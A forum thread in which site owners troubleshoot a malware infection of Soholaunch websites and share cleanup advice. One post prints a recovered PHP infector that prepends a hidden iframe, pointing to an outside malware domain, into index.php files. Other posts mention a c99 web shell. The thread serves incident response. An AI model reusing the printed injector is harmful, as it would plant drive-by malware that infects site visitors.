34 replies to this topic

[DrJon]

Yep - mine is the only IP address logged... It's a mystery

[draknet]

The only thing I could think of is maybe cron a search for the string so you get a timetable of when it changes, and then log-dive to see what's accessing anything during that time. That would at least narrow down the "when" of it happening so that you don't have to eyeball thousands of lines.

(If you have access to the server, ConfigServer Firewall has Directory and file watching capability with reports if a watched directory or a file changes.)

[kyle04]

Your ftp client (I use Filezilla) should list the date/time last modified for every file....

[DrJon]

Thanks Jen; unfortunately I don't have access to this server. They used to be a hosting client of mine until I gave it all up.... However, I do know the chap who hosts them now pretty well and he's a bit of a Unix guru so maybe I can prevail upon his good nature..

Changing the perms on the file doesn't seem to have compromised the site's functionality at all, so maybe I'll ask my man to let me have some of his logs!!

Don't ask, don't get

[DrJon]

I don't understand your post: the URL goes to a 404 error and looking at the code, it seems your site is unaffected anyway

[Matt Wilcox]

Had another run-in with this little bugger on another site of ours. The site hadn't been updated in a while. This one was putting an iframe up on all the pages and also had a photo.php file in the media folder. Only difference was that this time the php file was not encoded. Below is the php.

<?$sInjectPHP = "<iframe src=\"http://karatepacan.co.cc/up/go.php?sid=2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"?><?

$iMaxDepth = 4;

$iCurrDepth = 0;



$sDir = $_SERVER['DOCUMENT_ROOT'].'/';

Infect($sDir);



function Infect($sDir)

{

	global $iCurrDepth;

	global $iMaxDepth;

	global $sInjectPHP;

	global $sInjectHTML;

	global $sLog;

	

	if(file_exists($sDir) and $hDir = @opendir($sDir))

	{

		while(($sFileName = readdir($hDir)))

		{

			if(is_file($sDir.$sFileName))

			{

				$sExtension = substr($sFileName, strrpos($sFileName, '.')+1);

				switch($sExtension)

				{

					case 'php':

						if($sFileName == 'index.php')

						{

							$sFile = file_get_contents($sDir.$sFileName);

							$sFile = '<body>'.$sInjectPHP.'</body>'.$sFile;

							file_put_contents($sDir.$sFileName, $sFile);

						}

					break;

					

					/*case 'htm':

					case 'html':

						chmod($sDir.$sFileName, 666);

						$sFile = file_get_contents($sDir.$sFileName);

						$iPos = stripos($sFile, '</body>');

						if($iPos) $sFile = substr($sFile, 0, $iPos).$sInjectHTML.substr($sFile, $iPos);

						else $sFile .= $sInjectHTML;

						file_put_contents($sDir.$sFileName, $sFile);

					break;*/

				}

			}

			/*else if (is_dir($sDir.$sFileName) && $sFileName != '.' &&

					 $sFileName != '..' && $iCurrDepth <= $iMaxDepth)

			{

				$iCurrDepth++;

				Infect($sDir.$sFileName.'/');

				$iCurrDepth--;

			}*/

		}

		closedir($hDir);

	}

}

?>

[draknet]

We had half of the sites on our servers exploited with this (half of the Soholaunch sites). The update from Monday patches the hole, but if you don't have root and your clients don't update, they're likely going to get hit with it. It was pretty widespread.

If you do have a server, contact soho, they have a patch script you can run to mass patch all without upgrading.

[Matt Wilcox]

Nice, thanks! Yeah, we have soho on close to 40 accounts on our server

[DLecaval]

Hi, I had the same problem but after deleting photo.php, photo galery won't display photo anymore.
should there be a photo.php in media folder or elsewhere? If so where can I find a clean one?

Tks.

Daniel

[Matt Wilcox]

Just had another site that was infected. This time I was able to pull one of the files that was in base 64 and run it on my mac. I've run into this before, it's called c99madshell madnet edition, which you can google and check out for yourself. Basically, it allows whoever is running the php file to browse through your directories and view file contents and run linux commands. I can't stress enough how important it is to look everything over after you run the soho update and make sure you change all your passwords.

[draknet]

Just want to add an update - I'm starting to get a flood of notices from Google about Soho sites being pegged as Malware sites that have been infected - I've gotten four one after another in the last hour that have been yanked from the search engine.

I would suggest, if folks have not, that they:

Get an Account with Google Webmaster tools: Google Webmaster Central now
Verify their site
Make sure it has not been picked up yet as malware infected.
Check with your host regarding their malware infection policies - some hosts get Google notices and you are suspended or terminated, so find out before you get caught what your host's policy is.

We'll have a blog post up regarding this issue to our specific customers within an hour or two.

[gridstructure]

My site built with soho launch has also just been infected with malware from klezmoo.co.cc updates java script even if not requested when entering site. Google alert coming up but on link sent by host company it went straight in and started downloading. Any one got any idea how to fix it with out closing site?

[DrJon]

There's a number of suggestions in this thread.... Have you tried any of them yet?

[draknet]

My site built with soho launch has also just been infected with malware from klezmoo.co.cc updates java script even if not requested when entering site. Google alert coming up but on link sent by host company it went straight in and started downloading. Any one got any idea how to fix it with out closing site?

If your site is hacked now, and serving malicious software, you need to take that site offline *now* - not when you figure out how to clean it, not in a few days, now. You are potentially infecting your clients and visitors, if you take credit cards, potentially opening your site up to hefty PCI fines.

The easiest way to take a site offline for a user is to rename public_html, create a new public_html directory, and upload a page explaining that you are offline for maintenance. Then you can reinstall a current version of Soholaunch that doesn't have the hole in it, upload a backup (if you're sure it's clean), and be back and business with a minimum of fuss (making sure to change all the logins).

If you don't have a clean backup (or any backup at all), you have a pretty large problem and may have to rebuild.

[HongMei65]

This is a good post,i like it very much,i hope that you can creat more post like this.best wishes.